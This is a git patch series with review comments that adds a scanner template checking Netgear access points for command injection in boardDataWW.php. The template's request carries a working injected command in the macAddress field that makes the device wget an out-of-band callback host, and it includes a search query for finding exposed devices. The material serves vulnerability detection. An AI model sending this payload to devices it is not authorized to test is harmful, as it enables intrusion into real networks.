From 9ac9c195d7202f840cc8ad216c0be88301fb17dd Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Thu, 23 May 2024 18:27:16 +0530
Subject: [PATCH 1/3] Create netgear-boarddataww-rce.yaml
---
http/iot/netgear-boarddataww-rce.yaml | 39 +++++++++++++++++++++++++++
1 file changed, 39 insertions(+)
create mode 100644 http/iot/netgear-boarddataww-rce.yaml
diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml
new file mode 100644
index 0000000000..c83be5cafd
--- /dev/null
+++ b/http/iot/netgear-boarddataww-rce.yaml
@@ -0,0 +1,39 @@
+id: netgear-boarddataww-rce
+
+info:
+ name: Netgear router boardDataWW.php - Remote Code Execution
+ author: pussycat0x
+ severity: high
+ description: |
+ There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash.
+ reference:
+ - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md
+ metadata:
+ fofa-query: title=="Netgear"
+ tags: rce,netgear,iot
+
+http:
+ - raw:
+ - |
+ POST /boardDataWW.php HTTP/1.1
+ Host: {{Hostname}}
+ Accept: */*
+ Content-Type: application/x-www-form-urlencoded
+
+ macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ words:
+ - "http"
+
+ - type: word
+ part: body
+ words:
+ - "Netgear"
+
+ - type: status
+ status:
+ - 200
From 0551ac2a392f3c4ff5a72763f4c453937d87bdb3 Mon Sep 17 00:00:00 2001
From: pussycat0x <65701233+pussycat0x@users.noreply.github.com>
Date: Mon, 27 May 2024 20:55:22 +0530
Subject: [PATCH 2/3] lint - fix
---
http/iot/netgear-boarddataww-rce.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
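Review bot: In the new template from patch 1/3, the `interactsh_protocol` matcher is the only evidence of command execution, so a device with no outbound HTTP path (or no `wget`) is reported as not vulnerable even when it is; the `body` word `Netgear` and status 200 only fingerprint the device. I would record that limit in the description and add the `oast` tag so callback-dependent checks can be selected or excluded per scan profile, `tags: rce,netgear,iot,oast`. In the request body as rendered on this page the second form field reads `®info=0`, which looks like an entity-decoding artefact of `&reginfo=0`; confirm against the raw file before relying on the copy shown here.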
diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index c83be5cafd..56d5921e84 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -19,7 +19,7 @@ http: Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded - + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit matchers-condition: and From 051002ec78e6aca5dad8df6734dbf74ea895785c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 29 May 2024 13:43:14 +0530 Subject: [PATCH 3/3] minor update --- http/iot/netgear-boarddataww-rce.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/http/iot/netgear-boarddataww-rce.yaml b/http/iot/netgear-boarddataww-rce.yaml index 56d5921e84..7609c7043a 100644 --- a/http/iot/netgear-boarddataww-rce.yaml +++ b/http/iot/netgear-boarddataww-rce.yaml @@ -1,15 +1,18 @@ id: netgear-boarddataww-rce info: - name: Netgear router boardDataWW.php - Remote Code Execution + name: Netgear Devices boardDataWW.php Unauthenticated Remote Command Execution author: pussycat0x - severity: high + severity: critical description: | - There is an RCE vulnerability in boardDataWW.php of this product. Malicious attackers may use this vulnerability to execute malicious commands, eventually causing the server to crash. + boardDataWW.php in Netgear WN604 before 3.3.3 and WN802Tv2, WNAP210v2, WNAP320, WNDAP350, WNDAP360, and WNDAP660 before 3.5.5.0 allow remote attackers to execute arbitrary commands. reference: - https://github.com/wy876/POC/blob/main/Netgear%E8%B7%AF%E7%94%B1%E5%99%A8boardDataWW.php%E5%AD%98%E5%9C%A8RCE%E6%BC%8F%E6%B4%9E.md + - https://github.com/gobysec/GobyVuls/blob/master/Netgear_Devices_boardDataWW.php_Unauthenticated_Remote_Command_Execution.md metadata: fofa-query: title=="Netgear" + verified: true + max-request: 1 tags: rce,netgear,iot http:
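Review bot: The rewritten `description` in patch 3/3 names the fixed firmware versions, but the `info` block still gives the operator no action to take and no identifier to track the finding by. I would add `remediation: Upgrade WN604 to firmware 3.3.3 or later and the other listed models to 3.5.5.0 or later.` and, if an advisory id is assigned for this issue, a `classification` block carrying it (`cve-id: CVE-XXXX-XXXXX`, placeholder) so results can be joined with vulnerability-management data. The severity is raised to `critical` without CVSS metrics to back it; `cvss-metrics` in the same block would document the rating.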